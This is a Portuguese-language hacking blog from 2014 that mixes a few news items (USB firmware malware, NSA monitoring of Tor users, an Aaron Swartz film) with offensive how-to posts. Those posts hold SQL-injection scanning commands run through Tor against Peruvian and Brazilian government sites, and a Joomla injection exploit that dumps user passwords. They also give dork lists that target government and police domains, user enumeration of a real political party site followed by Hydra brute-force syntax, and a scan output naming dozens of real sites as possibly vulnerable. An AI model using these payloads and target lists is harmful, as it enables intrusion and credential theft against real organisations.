Black Hat 2014 desse ano promete viu ~
Dois pesquisadores de segurança estão prestes a divulgar uma descoberta sobre o USB que decreta o formato como um dos mais inseguros da atualidade.
Karsten Nohl e Jakob Lell construíram provas de conceito indicando que é possível contaminar uma unidade USB sem tocar na memória flash, focando apenas no firmware que controla suas funções.
Isso significa que nem a varredura mais completa encontraria o arquivo malicioso, e que qualquer coisa que use saída USB pode ser infectada - incluindo periféricos como teclado e mouse, além de pendrives.
Eles conseguiram colocar malwares nos chips usados para conectar um dispositivo ao computador e esses arquivos maliciosos são capazes de controlar funções e alterar pastas, além de direcionar o tráfego da internet a sites de interesse do atacante. Tudo sem serem notados.
O USB pode infectar o computador ou ser infectado por ele, e em nenhum dos casos o usuário comum tem chance de descobrir. Apenas um especialista com conhecimentos em engenharia reversa poderia encontrar o problema, mas só se estivesse procurando - e o firmware não costuma levantar suspeitas.
Os pesquisadores mostrarão como isso funciona durante a Black Hat, conferência anual sobre segurança que ocorre na semana que vem em Las Vegas, na intenção de estimular as pessoas a tomarem cuidado com o USB, porque este é um problema sem solução.
O que Nohl e Lell pretendem com a divulgação de suas descobertas é fazer um alerta para que as pessoas tratem dispositivos como pendrives da mesma forma que tratam seringas: cada um só pode usar o seu. É a única forma de garantir que não haverá complicações.
Nesta nova forma de pensar, você tem que considerar uma USB infectados e jogá-lo fora assim que ele toca em um computador não-confiável. "
Nohl e Lell, os investigadores para a consultoria de segurança SR Labs, estão longe de ser o primeiro a apontar que os dispositivos USB pode armazenar e espalhar malware. Mas os dois hackers não se limitou a copiar as suas próprias infecções com códigos personalizados para a memória de dispositivos USB '. Eles passaram meses engenharia reversa do firmware que executa as funções básicas de comunicação de dispositivos USB-os chips controladores que permitem que os dispositivos para se comunicar com um computador e permitir que os usuários mover arquivos dentro e fora deles. Sua descoberta central é que firmware USB, que existe em diferentes formas em todos os dispositivos USB, pode ser reprogramado para esconder código de ataque. "Você pode dar a seu povo em segurança de TI, eles digitalizá-lo, apagar alguns arquivos, e dá-lo de volta para você dizendo que é 'clean'", diz Nohl. Mas a menos que o cara de TI tem as habilidades de engenharia reversa para encontrar e analisar se o firmware, "o processo de limpeza nem sequer tocar os arquivos de que estamos falando."
http://www.wired.com/2014/07/usb-security/
quinta-feira, 31 de julho de 2014
terça-feira, 29 de julho de 2014
Vídeo Aula - Script InurlBr + SQLMAP + DecrypterMD5
Uma simples demonstração de funcionamento do SCANNER INURLBR junto com SQLMAP e DECRYPTERMD5.
Comandos utilizado:
php inurlbr.php --dork 'inurl:especialidades.php?id= site:gob.pe' --exploit-get '%27' -q 6 -s inurl_result.txt -p socks5://googleinurl@localhost:9050 --tor-random
Opções:
--dork = Define a dork que sera utilizada nos motores de busca
--exploit-get = Define o exploit via get, que será injetado em cada URL encontrada
-q = Define o motor de busca (ex.: google, bing, yahoo e etc...)
-s = Define o arquivo de saída, onde será armazenada as URLS encontradas
-p = Define o proxy para manter o anomimato
--tor-random = Habilita a função do tor randomico, a cada execução do script, o TOR muda de IP
Maiores detalhes:
https://github.com/googleinurl/SCANNER-INURLBR
Comando SQLMAP:
sqlmap --tor --tor-type=SOCKS5 -u http://sitevull.gob.pe/ --current-db --time-sec 10
Para utilizar o parametro "--tor" é necessário que esteja rodando localmente na porta 9050
Parrot e derivados: # service tor start
Verificar se está rodando: # netstat -an | grep 9050
tcp 0 0 127.0.0.1:9050 0.0.0.0:* LISTEN
Comando utilizado DECRYPTERMD5:
php md5.php --md5 HASH --proxy socks5://googleinurl@localhost:9050
Opções:
--md5 = Informando o tipo do HASH
--proxy = Ativando o proxy para anomimato
Para maiores informações utilize: # php md5.php --help
segunda-feira, 28 de julho de 2014
INURLBR API face V1.0 - PESQUISA DE DADOS PUBLICOS FACEBOOK
Script feito em php que pesquisa dados públicos através de requests do próprio facebook.
Temos acesso ao seguinte resultado:
ID::
USERNAME::
NOME::
PRIMEIRO NOME::
SOBRENOME::
SEXO::
LOCAL::
FOTO LOGO PEQUENA::
FOTO LOGO GRANDE::
FOTO LOGO::
FOTO::
Exemplo de uso:
[+] Pesquisa dados facebook, Ex: php face.php zuck
[ RETORNO ]
Baixar:: http://pastebin.com/TdfymVXr
Temos acesso ao seguinte resultado:
ID::
USERNAME::
NOME::
PRIMEIRO NOME::
SOBRENOME::
SEXO::
LOCAL::
FOTO LOGO PEQUENA::
FOTO LOGO GRANDE::
FOTO LOGO::
FOTO::
Exemplo de uso:
[+] Pesquisa dados facebook, Ex: php face.php zuck
Baixar:: http://pastebin.com/TdfymVXr
Dorks variadas voltadas pra sqlinjection.
Busca erros sql sites .gov, falhas fbconnect_action e outras variantes de erros.
site:.websiteseguro.com inurl:produto.php?id= site:.com /ccbill/ "DOCUMENT_ROOT" ext:cgi inurl:game.php?id= inurl:mil inurl:"/?fbconnect_action=myhome" site:.gov.br "Microsoft OLE DB Provider" site:.esporte.gov.br ext:asp site:.esporte.gov.br (id|new|ver) site:.esporte.gov.br (id|new|ver) site:.psdb.org.br ext:asp id site:.websiteseguro.com inurl:produto.php?id= site:.globo.com ext:php mysql_ site:.gov.br .php?id= syntax; -pdf -policiacivil site:.gov.br SQL "syntax;" site:.ap.gov.br "SQL syntax;" ext:php site:.gov.br ext:sql -svn site:.nsa.gov PDF -public_info site:.mil.br "mil br" index.php?option= view site:.com inurl:tinybrowser ext:php intitle: TinyBrowser site:.gov.br (error) mysql (prefeitura) ext:php -pdf site:br index.php?option=com_user site:.gov.br .php?id= syntax; site:.gov.br ext:php (id*=|view=) site:gov.br & intext:"SQL syntax" & +inurl:php?= +(id) -pdf -forum -softwarepublico -ppt -ftp -intext:"SQL injection" site:rj.gov.br (php|asp|aspx) ? id site:.gov.br syntax; -pdf inurl:(|&id=|?id=|) site:br ext:asp (id*=|view=) 80040E14 site:.com.br ext:asp (id*=|view=) 80040E14 -superasp site:.anatel.gov.br ext:asp site:.gov.br (php|asp|aspx) ? id notic site:.mg.gov.br (php|asp) ?id= intitle:camara site:.gov.br ext:php (id*=|view=) intitle:camara site:.gov.br ext:php (id*=|view=) -projetodomhelder intitle:prefeitura site:.gov.br ext:php (id*=|view=) syntax; inurl:?fbconnect_action= myhome&fbuserid=* site:br inurl:view.php?id=* ext:php -Bug -moodle site:.com.br inurl:"ver_news.php?id=" site:.ceara.gov.br ext:asp site:.sp.gov.br inurl:.php? intext:"Warning" -policiacivil intext:"vBulletin" inurl:install/upgrade.php site:.ceara.gov.br ext:asp site:.ceara.gov.br ext:asp "*.asp?" "=*" inurl:.policiacivil.sp.gov.br modules inurl:.policiacivil.sp.gov.br modules ".php?" inurl:"/?fbconnect_action=myhome" "id=" & intext:"Warning: mysql_fetch_array() "id=" & intext:"Warning: getimagesize() "id=" & intext:"Warning: session_start() "id=" & intext:"Warning: mysql_num_rows() "id=" & intext:"Warning: mysql_query() "id=" & intext:"Warning: array_merge() "id=" & intext:"Warning: preg_match() "id=" & intext:"Warning: ilesize() "id=" & intext:"Warning: filesize() site:.ar inurl:fbconnect_action= fbuserid= intext:User site:.ar inurl:fbconnect_action= fbuserid= inurl:fbconnect_action= fbuserid= intext:User (uk|br|com|ar|bo|info|net|org|us|in|au|es|fr) inurl:fbconnect_action= fbuserid= intext:User (uk|br|com|ar|bo|info|net|org|us|in|au|es|fr) ext:php (id*=|view=) inurl:(uk|br|com|ar|bo|info|net|org|us|in|au|es|fr) ext:php inurl:pageid? inurl:.policiacivil.sp.gov.br modules site:sp.gov.br "Warning:" ext:php
quinta-feira, 24 de julho de 2014
Introdução SCANNER INURLBR V1.0
*Busca avançada em motores de busca, Possibilita desde analise com exploit GET/POST a validação personalizada interna para cada alvo/url encontrada.
*Captura de emails.
*Execução de comandos direto no console para cada possível vulnerável. *Execução de comandos direto no console para todo alvo encontrado. *Analise de urls com base em arquivo txt, sem necessidade de usar motor de busca. *Definição de proxy. *Opção proxy TOR randômico.
_____ (_____) (() ()) \ / \ /
/=\
[___]
[INURLBR V1.0]
------------------------------------------------------------------------------
Explicando comando -q
Que é responsável por definir qual motor de busca vai efetuar os trabalhos.
-q tem acesso a 12 motores de busca.
1 - www.google.com.br
2 - www.bing.com
3 - br.search.yahoo.com
4 - www.ask.com
5 - search.hao123.com.br
6 - ajax.googleapis.com
7 - search.lycos.com
8 - busca.uol.com.br
9 - us.yhs4.search.yahoo.com
10 - pesquisa.sapo.pt
11 - www.dmoz.org
12 - www.gigablast.com
all - todos motores de busca
Default: 1
Exemplo: -q {op}
Uso:
-q 1
-q 5
Múltiplos motores -q 1,2,5,6,11
Todos motores -q all
Ex:
-----------------------------------------------------------------------------------------------------------------------------------
./inurlbr.php --dork 'site:br php?id=' -q 1,6 -s arquivo.txt --exploit-get "'´0x27"
-----------------------------------------------------------------------------------------------------------------------------------
0xVÍDEO[1]:
0xVÍDEO[2] - PARROT OS:
0xVÍDEO[2] - Usando Exploit joomla
0xDetalhes:
* joomla component com_tag (tag_id) SQL Injection Vulnerability
* [Joomla componente]
* com_tag (tag_id) Vulnerável a SQL-injection
0xCOMANDOS INURLBR:
./inurlbr.php --dork 'inurl:option=com_tag' -q 1,6 -s joomla.txt -t 3 --exploit-get '/index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat%28username,0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=component' -a 'Edit Tags'
0xDOWNLOAD SCRIPT
https://github.com/googleinurl/SCANNER-INURLBR
Ref:
http://blog.inurl.com.br/2014/07/joomla-component-comtag-tagid-sql.html
segunda-feira, 21 de julho de 2014
Testando novo Scanner inurl beta
BETA - Busca avançada em motores de busca, Possibilita desde analise com exploit GET/POST a captura de emails & validação personalizada interna para cada alvo/url encontrada.
#ZEND FRAMEWORK,#ERROS MYSQL,#ERROS MICROSOFT,#ERROS JDBC,#ERROS ORACLE,#ERROS POSTGRESQL,#ERROS PHP,#ERROS ASP,#ERROS LUA,#ERROS INDEFINIDOS_____ (_____) (() ()) \ / \ / /=\ [___]#####################################
#GRUPO GOOGLEINURL BRASIL - PESQUISA AVANÇADA.
#SCRIPT NAME: INURLBR
#AUTOR: Cleiton Pinheiro
#Nick: Googleinurl
#Blog: http://blog.inurl.com.br
#twitter: /@googleinurl
#facebook: /InurlBrasil
#Versão: 1.0
#-------------------------------------------------------------------------------
#PHP Version 5.4.7
#php5-curl LIB
#php5-cli LIB
#cURL support enabled
#cURL Information 7.24.0
#Apache 2.4
#allow_url_fopen On
#permission Reading & Writing
#User root privilege, or is in the sudoers group
#Operating system LINUX
#Proxy random TOR
#####################################
[YOUTUBE]
https://www.youtube.com/watch?v=_zpYVreCR_w
sexta-feira, 18 de julho de 2014
DecrypterMD5 API
[ INURLBR API DecrypterMD5 ]
bdbbe98d4714585c4a2eae76cd0e3cae
xNeither war between hackers, nor peace for the system.
----------------------------------------------------------------------------------
[+] Pesquisa por arquivo, Ex: php md5.php --file filemd5.txt[+] Pesquisa simples, Ex: php md5.php --md5 21232f297a57a5a743894a0e4a801fc3
_____ (_____) (() ()) \ / \ / /=\ [___]
----------------------------------------------------------------------------------
- Exemplo: --proxy {proxy:porta}
- Uso: --proxy localhost:8118
--proxy socks5://googleinurl@localhost:9050
--proxy http://admin:[email protected]:8080
O uso da rede TOR no script garante que você não seja bloqueado em requisições massivas.
Baixar:: http://pastebin.com/grYTVJKF
terça-feira, 15 de julho de 2014
ALGORITHM filme sobre hacking
<the_hacker_movie>
No centro da trama de ALGORITHM são as perguntas que estão sacudindo o mundo da tecnologia ao seu próprio núcleo, e as nações do mundo junto com eles: privacidade, direitos humanos, o lugar do governo na vida dos cidadãos, o valor e poder da tecnologia.
Primeiro Trailer
http://www.thehackermovie.com/
QUEBRAR SENHA DO ROOT com live CD
QUEBRAR SENHA DO ROOT
Acessando seu disco rígido com live CD.
Monta a partição, por exemplo: $mount /dev/sda2/ /mnt
Caso não tenha a pasta mnt crie ela: mkdir /mnt
Acessa a partição/sistema com o chroot: $chroot /mnt /bin/bash
Agora todo comando que for efetuado no terminal vai ser executado na maquina real,
Ou seja trocar a senha root do seu usuário
Ex:
$passwd usuário
$passwd root
Existe outra forma
Depois de montar a partição e executar o comando chroot
sudo gedit /etc/shadow
Primeira linha algo assim
root:AQUI_TEM_SENHA:16100:0:99999:7:::
Ex: root:$6$DsDwdas$4xFds.EfzTJl3I:16100:0:99999:7:::
Apague a senha
Vai ficar algo assim:
root::16100:0:99999:7:::
Feche o arquivo e salvando o mesmo, logo depois reinicia a maquina sem o cdlive.
E troque a senha do root, o mesmo serve para outros usuários.
$passwd root
quinta-feira, 3 de julho de 2014
joomla component com_tag (tag_id) SQL Injection Vulnerability
[Joomla componente]
[X] com_tag (tag_id) Vulnerável a SQL-injection
0xDORK[0]: inurl:option=com_tag
0xExploit[0]: /index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat%28username,0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=component
Exemplo:
http://WWW.URL.COM/index.php?option=com_tag
&controller=tag&task=add&article_id=1
/index.php?option=com_tag&controller=tag&task=add&article_id=-ID{vull}
Injetando:
http://
WWW.URL.COM
/index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat%28username,0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=component
RESPOSTA:
REF:http://www.exploit-id.com/web-applications/joomla-component-com_tag-tag_id-sql-injection-vulnerability
ALGUNS RESULTADOS:
Usando scanner INURLBR:
REPOSITÓRIO::: http://pastebin.com/Tb0Qp0qY
XKeyscore exposto: NSA define todos os utilizadores da rede Tor alemães como "extremistas".
A NSA foi revelado para marcar e considerar potenciais "extremistas" todos os usuários do serviço de internet anonymizer Tor. Entre aqueles que são centenas de milhares de pessoas preocupadas privacidade como jornalistas, advogados e ativistas de direitos.
Procurando software de criptografia, como o sistema operacional baseado em Linux Tails também coloca você no grid NSA, como Lena Kampf, Jacob Appelbaum e John Goetz revelado no site alemão Tagesschau. O relatório é baseado na análise do código-fonte do software usado por um programa de vigilância eletrônica XKeyscore da NSA.
Tor é um sistema de servidores, que encaminha as solicitações de usuários por meio de uma camada de conexões seguras para torná-lo impossível identificar IP de um usuário a partir dos endereços dos sites que ele / ela visita. A rede de cerca de 5.000 é operado por entusiastas e usado por centenas de milhares de pessoas de privacidade-preocupado todo o mundo. Alguns deles vivem em países com regimes opressivos, que punem os cidadãos para visitar sites que considerem inapropriado.
Mas o site apenas visitar projeto Tor coloca você na lista vermelha da NSA, diz o relatório. Mas o mais importante é que ele monitora as conexões com os chamados Autoridades Directory, os oito servidores, que atuam como gateways para todo o sistema.
A NSA foi particularmente vigiar alemão baseado Autoridades Diretório Tor. Uma é operado pelo grupo de hackers com sede na Alemanha Chaos Computer Club, o outro pelo estudante de ciência da computação Sebastian Hahn, que disse aos jornalistas que a revelação é "chocante".
O sistema em si não parece ser comprometida no entanto, mas a NSA recebe dados como endereços IP de quem o utiliza, o suficiente para cross-referenciá-los com outras bases de dados da agência tem acesso.
Rede anonymizer Tor entre as metas da NSA, vazamentos Snowden revelar
Há indícios de que a NSA pode ser de coleta não só os metadados das pessoas na lista, mas também ler as suas trocas de e-mail com Tor.
Um interesse em Tor não é a única maneira de fazê-lo a lista de vigilância da NSA. Até mesmo buscas na web para outro software de criptografia faz de você um alvo, bem como, segundo o relatório.
Perturbadoramente, comenta programador NSA na etiqueta de código fonte desses pego pelo sistema americano "extremistas".
O relatório diz que XKeyscore marca todas as pessoas que atingiram a luz vermelha em sua grade, com excepção dos conectando de membros dos cinco olhos, um grupo de países a cooperar na recolha de informações, ou seja, os EUA, Reino Unido, Canadá, Austrália e Nova Zelândia .
Fonte: http://rt.com/news/170208-nsa-spies-tor-users/
segunda-feira, 23 de junho de 2014
[Dumb0] extração de usuários + HYDRA força bruta em formularios web
Dumb0 é uma ferramenta possibilita extrair usuários ativos de plataformas CMS mais populares.
baixar: git clone https://github.com/0verl0ad/Dumb0.git
projeto: https://github.com/0verl0ad/Dumb0/
CMS que podemos extrair:
SMF -- Simple Machine ForumsUsando:
IPB -- Invision Power Board
XEN -- Xen Foro
VB -- vBulletin
myBB --
useBB --
vanilla --
bbPress --
WP -- WordPress
SPIP -- SPIP CMS
DRUPAL -- Drupal
MOODLE -- Moodle
BEE -- Beehive Forums
FLUX -- fluxBB
FUD -- FUDforum
punBB --
ACM -- AcmImBoard XD
BURN -- Burning Board
COM -- Community Servers
deluxeBB --
fusionBB --
JFORUM --
JITBIT -- Jibit ASPNetForum
JIVE -- Jive Forums
NEAR -- Near Forums
OVBB --
TikiWiki -- TikiWiki CMS-Groupware
Comando Dumb0 ex:
perl dumb0.pl --url=[SEU_ALVO URL] --type=[CMS/FORUM ID] {OPTIONS: --log=[SESSION COOKIE] --file[FILENAME] }
Uma vez identificado o CMS-usuarios podemos direcionar um ataque de força bruta contra eles via hydra.
Usando Hydra:
hydra URL http-form-post "/Path/archivo.php:ParametroUser=^USER^¶metroPass=^PASS^:MSG QUE INDICA FALHA" -L seus_user.txt -P senhas.txt
Sintaxe simples fica assim :
--------------------------------------------------------------------------------
hydra -l admin -P pass.txt -o out.txt -t 1 -f 127.0.0.1 http-post-form "/login/logar.php:user=^USER^&pass=^PASS^:Usuario ou senha invalida"
--------------------------------------------------------------------------------
Para criar esta sintaxe foi preciso :
Valor do atributo action do--------------------------------------------------------------------------------
<form> : logar.php Valor do atributo referente ao nome e senha de usuário nas tags <input> dentro do <form>: name , pass Mensagem de erro ou parte dela: "Usuário ou senha invalida" - O uso do caractere coringa é permitido : .*senha invalida - É possível usar uma mensagem de sucesso adicionando S= antes da mensagem :
--------------------------------------------------------------------------------
hydra -l admin -P pass.txt -o out.txt -t 1 -f -w 15 127.0.0.1 http-post-form "/login/logar.php:user=^USER^&pass=^PASS^:S=Logado com sucesso"
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
Exemplo de resultado Dumb0:
alvo:http://www.psdb-mg.org.br/
perl Dumb0.pl --type=WP --url='http://www.psdb-mg.org.br/' --file='ps.txt'
RESULTADO:
[!] Dumping users from http://www.psdb-mg.org.br/...
[+] Posible user found ~> admin – PSDB - MG
[+] Posible user found ~> psdb – PSDB - MG
[+] Posible user found ~> psdbjovem – PSDB - MG
[+] Posible user found ~> psdbmulher – PSDB - MG
[+] Posible user found ~> psdbsindical – PSDB - MG
[+] Posible user found ~> itv – PSDB - MG
[+] Posible user found ~> Alias – PSDB - MG
[+] Posible user found ~> tucanafro – PSDB - MG
[!] Work finished
Depois de terminado o scan de users, agora direcionar seu ataque de força bruta com Hydra.
REF:http://blog.0verl0ad.com/2014/02/dumb0pl-herramienta-para-extraer.html
REF:http://www.exploit-db.com/papers/18939/
Ferramenta Simple SQLi Dumper v5.1 - Tool
Simple SQLi Dumper v5.1 - Tool
Procura bugs,erros ou vulnerabilidades em aplicações que usem MySQL database.
Funções:
- SQL Injection,
- Operation System Function,
- Dump Database,
- Extract Database Schema,
- Search Columns Name,
- Read File (read only),
- Create File (read only),
- Brute Table & Column
Baixar:http://pastebin.com/ZGk5DKYa
sexta-feira, 20 de junho de 2014
DORK encontra erros non-object
Procurando notícias sobre erros de tratamentos PDO ou simples consultas SQL/Objetos.
----------------------------------------------------------------------------------------------------------------------------
DORK:
inurl:br intext:"Warning" || intext:"notice" "non-object in /" -"Revista PHP" -inurl:forum.
----------------------------------------------------------------------------------------------------------------------------
0xHOST GOOGLE........: www.google.com.br0xDORK...............: inurl:br intext:"Warning" || intext:"notice" "non-object in /" -"Revista PHP" -inurl:forum.
0xEXPLOIT............:
0xARQUIVO............: resultados.txt
0xTIPO DE ERRO.......: 2
0xPROCURAR NO ALVO...: non-object in
0xCOMANDO TERMINAL...: ping -c _ALVO_
0xIP PROXY...........:
0xPORTA..............:
----------------------------------------------------------------------------------------------------------------------------
DEBUG:
ArrayRESULTADO:
(
[0] => Array
(
)
[host] => www.google.com.br
[dork] => inurl%3Abr+++intext%3A%22Warning%22+%7C%7C+intext%3A%22notice%22+%22non-object+in+%2F%22+-%22Revista+PHP%22+-inurl%3Aforum.
[arquivo] => resultados.txt
[tipoerro] => 2
[exploit] =>
[achar] => non-object in
[cmd] => ping -c _ALVO_
[ipProxy] =>
[porta] =>
[url] => /search?q=inurl%3Abr+++intext%3A%22Warning%22+%7C%7C+intext%3A%22notice%22+%22non-object+in+%2F%22+-%22Revista+PHP%22+-inurl%3Aforum.&num=1900&btnG=Search
[port] => 80
)
TOTAL DE URL's: 196
EXPLOIT USADO:
DORK: inurl%3Abr+++intext%3A%22Warning%22+%7C%7C+intext%3A%22notice%22+%22non-object+in+%2F%22+-%22Revista+PHP%22+-inurl%3Aforum.
TOTAL DE POSSÍVEIS VULL: 78
ARQUIVO COM RESULTADO:resultados.txt
LISTA:
http://www.congressomedicopf.com.br/3/5/local
http://webcache.googleusercontent.com/search?q=cache:mHMik8Hn39cJ:http://www.congressomedicopf.com.br/3/5/local%2Binurl:br+++intext:%22Warning%22+%7C%7C+intext:%22notice%22+%22non-object+in+/%22+-%22Revista+PHP%22+-inurl:forum.&num=1900&hl=pt-BR&&ct=clnk
http://www.minhaentrada.com.br/evento/b
http://webcache.googleusercontent.com/search?q=cache:dujAQvNUaScJ:http://www.minhaentrada.com.br/evento/b%2Binurl:br+++intext:%22Warning%22+%7C%7C+intext:%22notice%22+%22non-object+in+/%22+-%22Revista+PHP%22+-inurl:forum.&num=1900&hl=pt-BR&&ct=clnk
http://www.3dcloner.com.br/post/conteudo-2/6/
http://www.gaiaexp.com.br/circuito-gaiaexp-trekking/pousada-sao-joao-da-mata/calendario-de-provas
http://www.phipasa.com.br/videos.php?id=%3Cbr%20/%3E%3Cb%3ENotice%3C/b%3E:%20%20Trying%20to%20get%20property%20of%20non-object%20in%20%3Cb%3E/home/storage/1/e8/f2/phipasa/public_html/modulos/videos/box-videos.php%3C/b%3E%20on%20line%20%3Cb%3E25%3C/b%3E%3Cbr%20/%3E
http://colinas.to.gov.br/conteudo/mi-dengue/263
http://www.shoppingvilla-lobos.com.br/index.php?option=com_loja&view=&Itemid=&codloja=9926944
http://www.shoppingvilla-lobos.com.br/index.php?option=com_loja&view=loja&Itemid=3&codloja=%3Cbr%20/%3E_%3Cb%3ENotice%3C/b%3E:%20%20Undefined%20property:%20stdClass::$COD_PESSOA%20in%20%3Cb%3ED:%5CSites%5Cshoppingvilla-lobos.com.br%5Ctemplates%5Csvl%5Chtml%5Ccom_loja%5Cloja%5Cdefault.php%3C/b%3E%20on%20line%20%3Cb%3E87%3C/b%3E%3Cbr%20/%3E_
http://www.ibiuna.sp.gov.br/cidadao_online/%3Cbr%20/%3E%3Cb%3ENotice%3C/b%3E:%20%20Trying%20to%20get%20property%20of%20non-object%20in%20%3Cb%3E/home/storage/c/52/9a/ibiuna2/public_html/view/prefeituraibiuna/cidadao_online/index.php%3C/b%3E%20on%20line%20%3Cb%3E42%3C/b%3E%3Cbr%20/%3Ehttp://www.ibiuna.sp.gov.br/cidadao_online/
http://photosblackbox.com.br/evento/2
http://www.brasilatletismo.com.br/noticias/noticias-1/no-ultimo-salto-duda-garante-vaga-na-final
http://www.afmbs.org.br/site/galeria
http://www-antigo.mpmg.mp.br/portal/public/promotoria/buscarpromotoria?idPromotoria=99
https://novosite.uninorte.com.br/galeria/acao-integrada-de-administracao/img_1696/
http://add.capes.gov.br/index.php/pt-BR/metadado.html?view=metadado
http://www.opticasitamaraty.com.br/lojas/item/458-pantas6
http://moradadaviola.tvabcd.com.br/reprises/
http://www.shoppingtacaruna.com.br/alimentacao/ver/297
http://www.riomarrecife.com.br/index.php?option=com_loja&view=&Itemid=&codloja=3763
http://apianet.com.br/filiais.php
http://www.abramppe.org.br/
http://omelhornacopa.com.br/v2/2014/02/
http://www.onetreinamento.com.br/eventos/eventos/saibamais/id/567
http://www.zapatamexicanbar.com.br/promocao/105800
http://www.santuarioscj.com.br/noticias/noticias-da-paroquia/avisos-paroquiais
http://br.sosveterinariaes.com.br/?cat=8
http://www.andes-vertical.com/adventure.php/%3Cbr%20/%3E%3Cb%3ENotice%3C/b%3E:%20%20Trying%20to%20get%20property%20of%20non-object%20in%20%3Cb%3E/home/ju000681/public_html/adventure.php%3C/b%3E%20on%20line%20%3Cb%3E140%3C/b%3E%3Cbr%20/%3E/0
http://www.mercadomineiro.com.br/index.php?m=empresa&id=556&empresa=Meta+Corpus+Pilates
http://www.theresinahall.com.br/videos/pr-poderoso-castiga--coletanea-2
http://www.houseekitchen.com.br/categoria/natal
http://www.inf.ufes.br/~rmanola/blog
http://www.fapesp.br/oportunidades/2000
http://liderinteriores.com.br/modulados/produto/office-linea
http://www.agmfr.com.br/index.php?option=com_events&task=view_detail&agid=9&year=2011&month=02&day=23&Itemid=52
http://www.grupoelogica.com.br/site/?go=clientes
http://www.criativa.com.br/trabalhos/
http://www.direitovirtual.com.br/diario-oficial/diario-tjpi-06082013-C10539.html
http://www.ceudecapella.com.br/einx/redirecionar-pagamento/2
http://caminhosviagens.com.br/viagem/caminhos-de-maria-C156774.html
http://www.jorlan.com.br/veiculo-novo.php?cid=Goiania
http://www.fundacaosemear.org.br/opinioes/detalhes/codigo/1
http://www.feiradocircuitodasmalhas.com.br/2014/camp-ex/
http://www.inpactopropaganda.com.br/novo/index.php/no-forno/97-campanha-70-anos-escritorio-sao-paulo
http://www.blogcentenario.unifei.edu.br/?page_id=2778
http://www.plaxmetal.com.br/componentes/0
http://www.motoryama.com.br/noticia/noticias_motoryama/7
http://www.onecursos.com.br/eventos/eventos/saibamais/id/692
http://www.datacom.ind.br/new/?q=pt-br/solucoes
https://www.pucci.eng.br/php_errors.log
http://www.ancoraengenharia.com.br/areas-de-atuacao/industriais
http://www.sepluga.com.br/
http://www.scvilaolimpia.com.br/index.php?option=com_loja&view=loja&Itemid=4&codloja=1938707
http://www.lwartimpermeabilizantes.com.br/destaques/destaque/chave/visita-tecnica---aplicadores
http://www.impressoramaster.com.br/loja/balcoes-retirada/campo-largo-rg-grafica-rapida-41-3469-2029
http://www.revistamissoes.org.br/artigos/ler/id/2601
http://www.bairroprado.com.br/detalhes-do-imovel/PR2530V/A0097
http://www.helbor.com.br/detalhes-da-noticia/imprensa/77
http://www.rzartmakeup.com.br/wordpress/portfolio_category/gloss/
http://www.jogosabertos2013.com.br/modalidade/bocha-pcd
http://www.spfilmagem.com.br/view.php?v=OVBRPT0=aae48a48d6e795eF8c90b0523dcaee7Y1ZOHYxTlIocFxpdA==MWE4ZGQxjk4NQ==M&i=WlBRPT0=2e0d3ae5c96fb6bw779a7910be8907cWVZYjA8ak5oLWVcMQ==MWE4ZGQxjk4NQ==M
http://www.fani.com.br/v2/index.php?page=produtos&cid=17
http://3pproducoes.com.br/servicos/
http://www.manoleeducacao.com.br/nutricaoclinica/programacao/aplicabilidade-da-bioimpedancia-eletrica-na-pratica-clinica
http://www.ciplak.com.br/destaques/destaque/chave/treinamento-rio-grande-do-norte
http://200.199.211.77/index.php/br/multimidia/imagens.html?folder=Aeroporto+de+Bras%C3%ADlia
http://quintadogolfe.com.br/clube/historia/
http://www.bolor.com.br/fotos
http://geif.com.br/categoria/conferencia-estadual-espirita-do-parana/
http://www.rccsc.com.br/interatividade/agenda/metanoia-2014-06-20
http://www.ipb.org.br/tv/tv4-19125044997583967
http://cefort.ufam.edu.br/portal/index.php?option=com_content&task=view&id=26&Itemid=48
http://www.assisimoveisjatai.com.br/imovel/single/3
http://nucleope.com.br/lancamentos/?id=52
http://viacatarina.com.br/lojas/detalhe/74
http://acervofundiario.incra.gov.br/i3geo/testamapfile.php?map=dnpm
http://rberaldo.com.br/as-mensagens-de-erros-mais-comuns-do-php/
root@paradoxo:/home/cleiton/pentest/Scanurl#
FILME - The Internet's Own Boy:A história de Aaron Swartz
A história do prodígio na programação e informação ativista Aaron Swartz. A partir da ajuda de Swartz no desenvolvimento do protocolo de internet básico RSS ao seu co-fundador do Reddit, suas impressões digitais estão por toda a internet. Mas era um trabalho inovador de Swartz em justiça social e organização política combinada com a sua abordagem agressiva para o acesso à informação que ele enredados em um pesadelo legal de dois anos. Foi uma batalha que terminou com a tomada de sua própria vida com a idade de 26. História de Aaron tocou um nervo com pessoas muito além das comunidades on-line, em que ele era uma celebridade. Este filme é uma história pessoal sobre o que perdemos quando estamos surdo sobre a tecnologia e sua relação com as nossas liberdades civis.
Swartz, que cometeu suicídio no ano passado sob a tensão de um processo criminal altamente duvidoso, tornou-se um jogador nos círculos de tecnologia em torno da idade de 13 anos. Mesmo antes disso, ele arquitetou um projeto Wikipedia-like antes de tal coisa existisse. (A professora lhe disse que a idéia era estúpido, mas ele ganhou um prêmio de prestígio.) No momento em que ele deixou a escola, ele deixou a sua marca em pelo menos três aspectos importantes de como funciona a Internet de hoje. Isso incluiu a construção da infra-estrutura para Creative Commons, o esquema alternativo por direitos autorais imaginado pelo ativista e professor de direito de Harvard Lawrence Lessig. Alguns anos mais tarde, ele ajudar a desenvolver Reddit, o lucro imensamente de sua venda para a Conde Nast e obter-se demitido porque ele odiava trabalhar em um ambiente de escritório.
Filmagem de um Aaron adolescente em grandes eventos de tecnologia mostra uma criança sendo tratado como um igual por profissionais estabelecidos; aqui, alguns recordam a sua surpresa ao saber que o colaborador que tinha conhecido apenas através da comunicação on-line era muito jovem. Não surpreendentemente, o gênio menino teve alguns problemas sociais. Irmão Noé descreve-o carinhosamente como "um imbecil", que sabia que ele era mais esperto do que os outros e não tentar escondê-lo; seus diários online reconhecer a abundância de alienação social.
[Trailer]
https://www.youtube.com/watch?v=RvsxnOg0bJY
[Mais infos]
http://www.hollywoodreporter.com/review/internets-own-boy-story-aaron-672701
#Liberdade
quarta-feira, 11 de junho de 2014
Pegando aquele shell marota com dork
